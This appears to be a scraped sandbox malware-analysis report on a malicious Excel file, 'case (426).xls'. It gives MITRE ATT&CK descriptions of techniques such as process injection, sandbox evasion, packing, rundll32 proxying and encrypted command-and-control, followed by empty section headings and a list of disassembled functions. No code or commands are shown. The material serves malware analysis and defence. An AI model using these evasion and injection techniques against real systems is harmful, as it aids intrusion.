Instruction ID: f02f903d2dd272a4138a7761e4e52e7b7db864338197488a3d1a01538f620e7e
Opcode Fuzzy Hash: f2e908e6812aa9bcd17f4081954baace572480927d5260a5a849c33e9e80e63c
Instruction Fuzzy Hash: 61E04FB2694204ABF65037E46C0AFEB3A7C9B04B42F440161FB0DD9181E6699454C7BA

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report case (426).xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "case (426).xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145744

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Function 6E86AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Function 6E87DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Function 6E87D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Function 6E87B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Function 6E8769A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Function 6E86D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Function 6E861A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Function 6E87DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Function 6E875BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Function 6E863A30, Relevance: .1, Instructions: 149
COMMONCrypto

Function 6E869A60, Relevance: .1, Instructions: 127
COMMONCrypto

Function 6E878830, Relevance: .1, Instructions: 113
COMMON

Function 6E869C60, Relevance: .1, Instructions: 95
COMMONCrypto

Function 6E87CE40, Relevance: .0, Instructions: 36
COMMON

Function 6E872EF0, Relevance: .0, Instructions: 2
COMMON

Function 6E8646E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Function 6E8629D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Function 000A9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Function 00091AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Function 0009BA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Function 000ABAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Function 000A1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Function 0009BCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Function 000A8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Function 0009A5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Function 0009ABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Function 000A4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Function 000A3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Function 000A5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Function 000A58D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
threadCOMMON

Function 000A9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Function 000AB790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Function 000921E0, Relevance: 3.1, APIs: 2, Instructions: 89
registryCOMMON

Function 000A5420, Relevance: 3.1, APIs: 2, Instructions: 72
fileCOMMON

Function 000A3D80, Relevance: 3.1, APIs: 2, Instructions: 72
registryCOMMON

Function 0009AD80, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 000AB530, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 0009E030, Relevance: 3.1, APIs: 2, Instructions: 54
registryCOMMON

Function 00093F90, Relevance: 3.1, APIs: 2, Instructions: 53
memoryCOMMON